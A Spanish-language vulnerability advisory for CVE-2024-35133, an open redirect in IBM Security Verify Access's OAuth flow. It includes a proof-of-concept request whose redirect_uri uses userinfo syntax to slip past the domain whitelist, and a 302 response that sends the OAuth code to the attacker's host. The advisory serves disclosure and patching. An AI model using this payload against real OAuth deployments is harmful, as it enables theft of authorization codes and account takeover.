
Boletín de seguridad para CVE-2024-35133 - Con PoC
Revisión: 1.0
Impacto:
Al persuadir a una víctima para que visite un sitio web especialmente diseñado, un atacante remoto podría explotar esta vulnerabilidad para suplantar la URL mostrada y redirigir al usuario a un sitio web malicioso. Esto podría permitir al atacante obtener información altamente sensible o llevar a cabo ataques adicionales contra la víctima.
Severidad:
Puntuación CVSS:
CVE-ID: CVE-2024-35133
Proveedor: IBM
Productos afectados:
Versiones afectadas: 10.0.0 - 10.0.8
IBM Security Verify Access es una solución completa de gestión de políticas de autorización y seguridad de red. Proporciona protección de extremo a extremo de los recursos en intranets y extranets geográficamente dispersas.
Algunas características clave incluyen:
Durante una prueba de penetración del flujo OAuth para un cliente, se descubrió una vulnerabilidad de redirección abierta que permitía la fuga de la variable "code" de OAuth.
Al omitir la lógica del analizador responsable de verificar el parámetro "redirect_uri" durante un flujo OAuth (aprovechando RFC 3986), el atacante podía manipular el filtro de lista blanca de dominios en IBM Security Verify Access. Esto resultaba en una redirección abierta a cualquier dominio arbitrario controlado por el atacante. La víctima podía ser redirigida a un sitio malicioso mientras el dominio parecía ser de confianza.
Esto podría provocar la exposición de información sensible como el token "code" de OAuth o ataques adicionales contra la víctima.
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
Consulte el Boletín de Seguridad de IBM 7166712 para obtener información sobre parches, actualizaciones o soluciones alternativas sugeridas.
Vea Referencias para más detalles.
Esta vulnerabilidad fue descubierta y reportada por:
Copyright (c) 2024 Giulio Garzia "Ozozuz"
Se concede permiso para la redistribución electrónica de esta alerta. No puede ser editada sin consentimiento escrito explícito. Para obtener permiso para reimprimir esta alerta en otros medios, contacte con el autor.
Descargo de responsabilidad: La información de este aviso es precisa en el momento de su publicación según los datos disponibles. No se ofrecen garantías. Ni el autor ni el editor aceptan responsabilidad por daños directos, indirectos o consecuentes derivados del uso de esta información.